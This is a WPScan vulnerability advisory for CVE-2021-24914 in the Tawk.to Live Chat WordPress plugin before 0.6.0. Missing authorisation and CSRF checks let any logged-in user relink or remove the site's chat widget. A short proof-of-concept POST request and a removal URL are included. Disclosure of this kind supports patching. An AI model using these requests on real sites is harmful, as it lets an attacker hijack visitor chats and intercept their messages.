WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Tawk.to Live Chat < 0.6.0 - Subscriber+ Visitor Monitoring & Chat Removal

Description

The plugin does not have capability and CSRF checks in the tawkto_setwidget and tawkto_removewidget AJAX actions, available to any authenticated user. The first one allows low-privileged users (including simple subscribers) to change the 'tawkto-embed-widget-page-id' and 'tawkto-embed-widget-widget-id' parameters. Any authenticated user can thus link the vulnerable website to their own Tawk.to instance. Consequently, they will be able to monitor the vulnerable website and interact with its visitors (receive contact messages, answer, ...). They will also be able to display an arbitrary Knowledge Base. The second one will remove the live chat widget from pages.

Proof of Concept

POST /wp-admin/admin-ajax.php?action=tawkto_setwidget
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Cookie: [any authenticated user]

pageId=61786f4e86aee40a573880d7&widgetId=1fiv75jah


https://example.com/wp-admin/admin-ajax.php?action=tawkto_removewidget 

Affects Plugins

tawkto-live-chat
Fixed in version 0.6.0

References

CVE
CVE-2021-24914

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Quentin VILLAIN (3wsec)

Submitter

Quentin VILLAIN (3wsec)

Submitter website
https://3wsec.fr
Verified

Yes

WPVDB ID
39392055-8cd3-452f-8bcb-a650f5bddc2e

Timeline

Publicly Published

2021-11-08 (about 1 years ago)

Added

2021-11-08 (about 1 years ago)

Last Updated

2022-04-11 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us